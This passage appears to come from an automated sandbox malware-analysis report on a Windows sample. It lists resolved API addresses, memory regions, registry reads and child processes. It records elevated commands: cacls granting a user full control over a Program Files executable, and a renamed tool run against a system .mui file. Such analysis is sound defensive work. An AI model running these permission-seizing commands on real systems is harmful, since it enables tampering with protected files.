| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:04 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #211: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #211 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:29, Reason: Child Process |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf40 |
| Parent PID | 0xea0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
354
0x
734
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00af3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x00b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00baffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00bb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00bd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00d60000 | 0x00d61fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dcffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00dd0000 | 0x00e8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00f9ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05050000 | 0x05386fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f330000 | 0x7f330000 | 0x7f42ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f430000 | 0x7f430000 | 0x7f452fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f455000 | 0x7f455000 | 0x7f455fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f459000 | 0x7f459000 | 0x7f45bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f45c000 | 0x7f45c000 | 0x7f45efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f45f000 | 0x7f45f000 | 0x7f45ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #212: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #212 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "ImagingDevices.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:30, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x928 |
| Parent PID | 0x4e8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
150
0x
850
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x04a1ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a20000 | 0x04a20000 | 0x04a2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a43fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a50000 | 0x04a50000 | 0x04a63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bb0000 | 0x04bb0000 | 0x04bb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bc0000 | 0x04bc0000 | 0x04bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04bd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c30000 | 0x04cedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04f3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04f40000 | 0x05276fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f270000 | 0x7f270000 | 0x7f36ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f370000 | 0x7f370000 | 0x7f392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f396000 | 0x7f396000 | 0x7f398fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f399000 | 0x7f399000 | 0x7f39bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39c000 | 0x7f39c000 | 0x7f39cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39f000 | 0x7f39f000 | 0x7f39ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xd74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
